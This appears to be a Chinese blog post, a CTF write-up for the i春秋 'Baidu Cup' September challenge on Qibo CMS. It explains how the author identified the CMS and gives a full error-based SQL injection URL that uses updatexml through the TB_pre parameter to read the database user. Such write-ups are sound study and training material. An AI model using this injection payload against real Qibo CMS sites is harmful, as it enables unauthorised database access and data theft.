i春秋 “百度杯”CTF比赛 九月场 再见CMS

本文介绍了参与i春秋举办的“百度杯”CTF比赛中关于CMS的一道题目。作者通过网站备案信息发现可能涉及齐博CMS,利用其存在的注入漏洞尝试获取数据。在遇到加密字段无法解密的情况下,作者通过获取文件内容并采用16进制绕过转义,最终成功获取所需信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

友链

在这里插入图片描述

https://www.ichunqiu.com/battalion?t=1&r=0

这道题刚做的时候是没有头绪的,看了一眼writeup,得知要通过网站下方的备案记录来查询除网站相关信息,并进而得知该网站所使用的的cms,但是我照着做的时候却查不出来结果,ICP/IP官网返回说无匹配信息,于是我就参考writeup直接搜索了齐博CMS的相关漏洞,我使用的是这一个:
http://0day5.com/archives/3300/

一个SQL注入漏洞,我的payload是这样构造的:

http://0fcda0b05d364ae2919c79c0386ebb055c1719c2b26941cc.game.ichunqiu.com/blog/index.php?
file=listbbs&uid=1&id=1&TB_pre=
(select * from information_schema.tables where 1=2 or (updatexml(1,concat(0x7e,(
					select user()
),0x7e),1)))a%23

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值